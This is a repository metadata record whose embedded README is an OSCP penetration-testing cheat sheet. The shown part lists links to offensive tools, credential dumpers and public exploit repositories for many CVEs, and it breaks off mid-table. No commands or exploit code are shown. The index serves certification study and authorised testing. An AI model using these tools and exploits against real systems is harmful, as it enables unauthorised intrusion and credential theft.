{"id":13679795,"url":"https://github.com/0xsyr0/OSCP","last_synced_at":"2025-04-29T19:32:02.458Z","repository":{"id":47026242,"uuid":"420042240","full_name":"0xsyr0/OSCP","owner":"0xsyr0","description":"OSCP Cheat Sheet","archived":false,"fork":false,"pushed_at":"2025-04-22T13:11:27.000Z","size":5490,"stargazers_count":3157,"open_issues_count":0,"forks_count":671,"subscribers_count":67,"default_branch":"main","last_synced_at":"2025-04-22T13:49:10.721Z","etag":null,"topics":["cheat-sheet","cheatsheet","offensive","offensive-security","offsec","oscp","oscp-guide","oscp-plus","penetration-testing","pentesting","security"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xsyr0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":"CODE-OF-CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null},"funding":{"github":"0xsyr0","patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"lfx_crowdfunding":null,"custom":null}},"created_at":"2021-10-22T09:36:48.000Z","updated_at":"2025-04-22T13:11:30.000Z","dependencies_parsed_at":"2023-09-29T07:10:50.464Z","dependency_job_id":"c7035127-0d5a-45ef-b3ed-c64fe7164f3c","html_url":"https://github.com/0xsyr0/OSCP","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xsyr0%2FOSCP/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xsyr0","download_url":"https://codeload.github.com/0xsyr0/OSCP/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251569549,"owners_count":21610575,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cheat-sheet","cheatsheet","offensive","offensive-security","offsec","oscp","oscp-guide","oscp-plus","penetration-testing","pentesting","security"],"created_at":"2024-08-02T13:01:09.665Z","updated_at":"2025-04-29T19:31:57.443Z","avatar_url":"https://github.com/0xsyr0.png","language":"PowerShell","funding_links":["https://github.com/sponsors/0xsyr0"],"categories":["PowerShell","红队\u0026渗透测试"],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n \u003cimg width=\"300\" height=\"300\" src=\"/images/kali-linux.svg\"\u003e\n\u003c/p\u003e\n\n# OSCP Cheat Sheet\n\n![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)\u003c/br\u003e\n![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP)\n\nSince this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. As OffSec published the `OffSec Certified Professional Plus` or `OSCP+` certification which is only valid for `3 years`, I now will add more advanced techniques like for example `Active Directory Certificate Services (ADCS) Abuse` and `Shadow Credentials Attacks` to cover as much course content as possible.\n\nFeel free to submit a pull request or reach out to me on [X](https://twitter.com/syr0_) for suggestions. Every contribution is appreciated!\n\n\u003e [!IMPORTANT]\n\u003e A guy on X got a point. Automatic exploitation tools like `sqlmap` are prohibited to use in the exam. The same goes for the automatic exploitation functionality of `LinPEAS`.\n\u003e I am not keeping track of current guidelines related to those tools. For that I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam.\n\u003e Inform yourself before taking the exam!\n\nHere are the link to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and the discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). I hope this helps.\n\nAlso here are two more important resources you should check out before you take the exam.\n\n- [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)\n- [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams)\n\n\u003e [!NOTE]\n\u003e This repository will also try to cover as much as possible of the tools required for the proving grounds boxes.\n\nThank you for reading.\n\n\u003cbr\u003e\n\n## Table of Contents\n\n- [Basics](#basics)\n- [Information Gathering](#information-gathering)\n- [Vulnerability Analysis](#vulnerability-analysis)\n- [Web Application Analysis](#web-application-analysis)\n- [Database Assessment](#database-assessment)\n- [Password Attacks](#password-attacks)\n- [Exploitation Tools](#exploitation-tools)\n- [Post Exploitation](#post-exploitation)\n- [Exploit Databases](#exploit-databases)\n- [CVEs](#cves)\n- [Payloads](#payloads)\n- [Wordlists](#wordlists)\n- [Reporting](#reporting)\n- [Social Media Resources](#social-media-resources)\n- [Commands](#commands)\n\t- [Basics](#basics-1)\n\t\t- [curl](#curl)\n\t\t- [File Transfer](#file-transfer)\n \t\t- [FTP](#ftp)\n\t\t- [Kerberos](#kerberos)\n\t\t- [Linux](#linux)\n\t\t- [Microsoft Windows](#microsoft-windows)\n\t\t- [PHP Webserver](#php-webserver)\n\t\t- [Ping](#ping)\n\t\t- [Port Forwarding](#port-forwarding-1)\n\t\t- [Python Webserver](#python-webserver)\n\t\t- [RDP](#rdp)\n\t\t- [showmount](#showmount)\n \t\t- [SMB](#smb)\n\t\t- [smbclient](#smbclient)\n\t\t- [SSH](#ssh)\n\t\t- [Time and Date](#time-and-date)\n\t\t- [Tmux](#tmux)\n\t\t- [Upgrading Shells](#upgrading-shells)\n\t\t- [VirtualBox](#virtualbox)\n\t\t- [virtualenv](#virtualenv)\n\t- [Information Gathering](#information-gathering-1)\n\t\t- [memcached](#memcached)\n\t\t- [NetBIOS](#netbios)\n\t\t- [Nmap](#nmap)\n\t\t- [Port Scanning](#port-scanning)\n\t\t- [snmpwalk](#snmpwalk)\n\t- [Web Application Analysis](#web-application-analysis-1)\n\t\t- [Burp Suite](#burp-suite)\n \t\t- [cadaver](#cadaver)\n\t\t- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)\n\t\t- [ffuf](#ffuf)\n\t\t- [Gobuster](#gobuster)\n\t\t- [GitTools](#gittools)\n\t\t- [Local File Inclusion (LFI)](#local-file-inclusion-lfi)\n\t\t- [PDF PHP Inclusion](#pdf-php-inclusion)\n\t\t- [PHP Upload Filter Bypasses](#php-upload-filter-bypasses)\n\t\t- [PHP Filter Chain Generator](#php-filter-chain-generator)\n\t\t- [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc)\n\t\t- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)\n\t\t- [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)\n\t\t- [Upload Vulnerabilities](#upload-vulnerabilities)\n\t\t- [wfuzz](#wfuzz)\n\t\t- [WPScan](#wpscan)\n\t\t- [XML External Entity (XXE)](#xml-external-entity-xxe)\n\t- [Database Analysis](#database-analysis)\n \t\t- [impacket-mssqlclient](#impacket-mssqlclient)\n\t\t- [MongoDB](#mongodb)\n\t\t- [MSSQL](#mssql)\n\t\t- [MySQL](#mysql)\n\t\t- [NoSQL Injection](#nosql-injection)\n\t\t- [PostgreSQL](#postgresql)\n\t\t- [Redis](#redis)\n\t\t- [SQL Injection](#sql-injection)\n\t\t- [SQL Truncation Attack](#sql-truncation-attack)\n\t\t- [sqlite3](#sqlite3)\n\t\t- [sqsh](#sqsh)\n\t- [Password Attacks](#password-attacks-1)\n\t\t- [DonPAPI](#donpapi)\n\t\t- [fcrack](#fcrack)\n \t\t- [Group Policy Preferences (GPP)](#group-policy-preferences-gpp)\n\t\t- [hashcat](#hashcat)\n\t\t- [Hydra](#hydra)\n\t\t- [John](#john)\n\t\t- [Kerbrute](#kerbrute)\n\t\t- [LaZagne](#lazagne)\n\t\t- [mimikatz](#mimikatz)\n \t\t- [NetExec](#netexec)\n\t\t- [pypykatz](#pypykatz)\n\t\t- [Spray-Passwords](#spray-passwords)\n\t- [Exploitation Tools](#exploitation-tools-1)\n\t\t- [Metasploit](#metasploit)\n\t- [Post Exploitation](#post-exploitation-1)\n \t\t- [Account Operators Group Membership](#account-operators-group-membership)\n \t\t- [Active Directory](#active-directory)\n \t\t- [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs)\n\t\t- [ADCSTemplate](#adcstemplate)\n \t\t- [ADMiner](#adminer)\n\t\t- [BloodHound](#bloodhound)\n\t\t- [BloodHound Python](#bloodhound-python)\n \t\t- [bloodyAD](#bloodyAD)\n\t\t- [Certify](#certify)\n\t\t- [Certipy](#certipy)\n\t\t- [enum4linux-ng](#enum4linux-ng)\n\t\t- [Evil-WinRM](#evil-winrm)\n\t\t- [Impacket](#impacket-1)\n\t\t- [JAWS](#jaws)\n\t\t- [Kerberos](#kerberos-1)\n\t\t- [ldapsearch](#ldapsearch)\n\t\t- [Linux](#linux-1)\n\t\t- [Microsoft Windows](#microsoft-windows-1)\n\t\t- [PassTheCert](#passthecert)\n\t\t- [PKINITtools](#pkinittools)\n\t\t- [Port Scanning](#port-scanning-1)\n\t\t- [powercat](#powercat)\n\t\t- [Powermad](#powermad)\n\t\t- [PowerShell](#powershell)\n \t\t- [PrivescCheck](#privesccheck)\n\t\t- [pwncat](#pwncat)\n\t\t- [rpcclient](#rpcclient)\n\t\t- [Rubeus](#rubeus)\n\t\t- [RunasCs](#runascs)\n\t\t- [Seatbelt](#seatbelt)\n\t\t- [Shadow Credentials](#shadow-credentials)\n\t\t- [smbpasswd](#smbpasswd)\n\t\t- [winexe](#winexe)\n\t- [Social Engineering Tools](#social-engineering-tools)\n\t\t- [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro)\n\t\t- [Microsoft Windows Library Files](#microsoft-windows-library-files)\n\t- [CVE](#cve)\n\t\t- [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc)\n\t\t- [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe)\n\t\t- [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass)\n\t\t- [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe)\n\t\t- [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe)\n\t\t- [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day)\n\t\t- [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe)\n\t\t- [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day)\n\t\t- [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe)\n\t\t- [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe)\n\t\t- [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass)\n\t\t- [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day)\n \t\t- [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe)\n \t\t- [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover)\n \t\t- [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce)\n \t\t- [GodPotato LPE](#godpotato-lpe)\n\t\t- [Juicy Potato LPE](#juicy-potato-lpe)\n \t\t- [JuicyPotatoNG LPE](#juicypotatong-lpe)\n\t\t- [MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe)\n \t\t- [PrintSpoofer LPE](#printspoofer-lpe)\n\t\t- [SharpEfsPotato LPE](#sharpefspotato-lpe)\n\t\t- [Shocker Container Escape](#shocker-container-escape)\n\t- [Payloads](#payloads-1)\n\t\t- [Exiftool](#exiftool)\n\t\t- [Reverse Shells](#reverse-shells)\n\t\t- [Web Shells](#web-shells)\n\t- [Templates](#templates)\n\t\t- [ASPX Web Shell](#aspx-web-shell)\n\t\t- [Bad YAML](#bad-yaml)\n\t- [Wordlists](#wordlists-1)\n\t\t- [Bash](#bash)\n\t\t- [CeWL](#cewl)\n\t\t- [CUPP](#cupp)\n\t\t- [crunch](#crunch)\n \t\t- [JavaScript Quick Wordlist](#javascript-quick-wordlist)\n\t\t- [Username Anarchy](#username-anarchy)\n\n### Basics\n\n| Name | URL |\n| --- | --- |\n| Chisel | https://github.com/jpillora/chisel |\n| CyberChef | https://gchq.github.io/CyberChef |\n| Ligolo-ng | https://github.com/nicocha30/ligolo-ng |\n| Swaks | https://github.com/jetmore/swaks |\n\n### Information Gathering\n\n| Name | URL |\n| --- | --- |\n| Nmap | https://github.com/nmap/nmap |\n\n### Vulnerability Analysis\n\n| Name | URL |\n| --- | --- |\n| nikto | https://github.com/sullo/nikto |\n| Sparta | https://github.com/SECFORCE/sparta |\n\n### Web Application Analysis\n\n| Name | URL |\n| --- | --- |\n| ffuf | https://github.com/ffuf/ffuf |\n| fpmvuln | https://github.com/hannob/fpmvuln |\n| Gobuster | https://github.com/OJ/gobuster |\n| JSON Web Tokens | https://jwt.io |\n| JWT_Tool | https://github.com/ticarpi/jwt_tool |\n| Leaky Paths | https://github.com/ayoubfathi/leaky-paths |\n| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |\n| PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator |\n| PHPGGC | https://github.com/ambionics/phpggc |\n| Spose | https://github.com/aancw/spose |\n| Wfuzz | https://github.com/xmendez/wfuzz |\n| WhatWeb | https://github.com/urbanadventurer/WhatWeb |\n| WPScan | https://github.com/wpscanteam/wpscan |\n\n### Database Assessment\n\n| Name | URL |\n| --- | --- |\n| RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand |\n| Redis RCE | https://github.com/Ridter/redis-rce |\n| Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server |\n| SQL Injection Cheatsheet | https://tib3rius.com/sqli.html |\n\n### Password Attacks\n\n| Name | URL |\n| --- | --- |\n| Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |\n| Firefox Decrypt | https://github.com/unode/firefox_decrypt |\n| hashcat | https://hashcat.net/hashcat |\n| Hydra | https://github.com/vanhauser-thc/thc-hydra |\n| John | https://github.com/openwall/john |\n| keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey |\n| KeePwn | https://github.com/Orange-Cyberdefense/KeePwn |\n| Kerbrute | https://github.com/ropnop/kerbrute |\n| LaZagne | https://github.com/AlessandroZ/LaZagne |\n| mimikatz | https://github.com/gentilkiwi/mimikatz |\n| NetExec | https://github.com/Pennyw0rth/NetExec |\n| ntlm.pw | https://ntlm.pw |\n| pypykatz | https://github.com/skelsec/pypykatz |\n\n### Exploitation Tools\n\n| Name | URL |\n| --- | --- |\n| Evil-WinRM | https://github.com/Hackplayers/evil-winrm |\n| Metasploit | https://github.com/rapid7/metasploit-framework |\n\n### Post Exploitation\n\n| Name | URL |\n| --- | --- |\n| ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller |\n| ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate |\n| ADMiner | https://github.com/Mazars-Tech/AD_Miner |\n| adPEAS | https://github.com/ajm4n/adPEAS |\n| BloodHound Docker | https://github.com/belane/docker-bloodhound |\n| BloodHound | https://github.com/BloodHoundAD/BloodHound |\n| BloodHound | https://github.com/ly4k/BloodHound |\n| BloodHound Collectors | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors |\n| BloodHound Python | https://github.com/dirkjanm/BloodHound.py |\n| bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin |\n| Certify | https://github.com/GhostPack/Certify |\n| Certipy | https://github.com/ly4k/Certipy |\n| Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory |\n| DonPAPI | https://github.com/login-securite/DonPAPI |\n| enum4linux-ng | https://github.com/cddmp/enum4linux-ng |\n| Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries |\n| GTFOBins | https://gtfobins.github.io |\n| Impacket | https://github.com/fortra/impacket |\n| Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries |\n| JAWS | https://github.com/411Hall/JAWS |\n| KrbRelay | https://github.com/cube0x0/KrbRelay |\n| KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp |\n| Krbrelayx | https://github.com/dirkjanm/krbrelayx |\n| LAPSDumper | https://github.com/n00py/LAPSDumper |\n| LES | https://github.com/The-Z-Labs/linux-exploit-suggester |\n| LinEnum | https://github.com/rebootuser/LinEnum |\n| lsassy | https://github.com/Hackndo/lsassy |\n| Moriaty | https://github.com/BC-SECURITY/Moriarty |\n| nanodump | https://github.com/fortra/nanodump |\n| PassTheCert | https://github.com/AlmondOffSec/PassTheCert |\n| PEASS-ng | https://github.com/carlospolop/PEASS-ng |\n| PKINITtools | https://github.com/dirkjanm/PKINITtools |\n| powercat | https://github.com/besimorhino/powercat |\n| PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |\n| PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |\n| PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |\n| PowerView.py | https://github.com/aniqfakhrul/powerview.py |\n| PPLdump | https://github.com/itm4n/PPLdump |\n| Priv2Admin | https://github.com/gtworek/Priv2Admin |\n| PrivescCheck | https://github.com/itm4n/PrivescCheck |\n| PSPKIAudit | https://github.com/GhostPack/PSPKIAudit |\n| pspy | https://github.com/DominicBreuker/pspy |\n| pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |\n| pwncat | https://github.com/calebstewart/pwncat |\n| pypykatz | https://github.com/skelsec/pypykatz |\n| PyWhisker | https://github.com/ShutdownRepo/pywhisker |\n| Rubeus | https://github.com/GhostPack/Rubeus |\n| RunasCs | https://github.com/antonioCoco/RunasCs |\n| RustHound | https://github.com/OPENCYBER-FR/RustHound |\n| scavenger | https://github.com/SpiderLabs/scavenger |\n| SharpADWS | https://github.com/wh0amitz/SharpADWS |\n| SharpCollection | https://github.com/Flangvik/SharpCollection |\n| SharpChromium | https://github.com/djhohnstein/SharpChromium |\n| SharpHound | https://github.com/BloodHoundAD/SharpHound |\n| SharpView | https://github.com/tevora-threat/SharpView |\n| Sherlock | https://github.com/rasta-mouse/Sherlock |\n| WADComs | https://wadcoms.github.io |\n| Watson | https://github.com/rasta-mouse/Watson |\n| WESNG | https://github.com/bitsadmin/wesng\n| Whisker | https://github.com/eladshamir/Whisker |\n| Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check |\n| Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |\n| Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |\n\n### Exploit Databases\n\n| Database | URL |\n| --- | --- |\n| 0day.today Exploit Database | https://0day.today |\n| Exploit Database | https://www.exploit-db.com |\n| Packet Storm | https://packetstormsecurity.com |\n| Sploitus | https://sploitus.com |\n\n### CVEs\n\n| CVE | Descritpion | URL |\n| --- | --- | --- |\n| CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker |\n| CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 |\n| CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs |\n| CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow |\n| CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 |\n| CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 |\n| CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue |\n| CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 |\n| CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE |\n| CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 |\n| CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 |\n| CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 |\n| CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 |\n| CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC |\n| CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln |\n| CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock |\n| CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC |\n| CVE-2020-1472 | ZeroLogon PE Checker \u0026 Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 |\n| CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon |\n| CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 |\n| CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 |\n| CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 |\n| CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 |\n| CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 |\n| CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 |\n| CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE |\n| CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool |\n| CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 |\n| CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 |\n| CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit |\n| CVE-2021-3156 | Sudo / sudoedit LPE | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit |\n| CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 |\n| CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 |\n| CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 |\n| CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit |\n| CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation |\n| CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare |\n| CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam |\n| CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |\n| CVE-2021-4034 | PwnKit Pkexec Self-contained Exploit LPE | https://github.com/ly4k/PwnKit |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 |\n| CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 |\n| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archive) | https://github.com/klinix5/InstallerFileTakeOver |\n| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver |\n| CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | Simples Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal |\n| CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin |\n| CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine |\n| CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac |\n| CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac |\n| CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 |\n| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc |\n| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit |\n| CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe |\n| CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits |\n| CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool |\n| CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en |\n| CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro |\n| CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 |\n| CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn |\n| CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 |\n| CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 |\n| CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC |\n| CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit |\n| CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL |\n| CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato |\n| CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 |\n| CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b |\n| CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc |\n| CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 |\n| CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC |\n| CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce |\n| CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 |\n| CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 |\n| CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 |\n| CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass |\n| CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 |\n| CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 |\n| CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 |\n| CVE-2024-1086 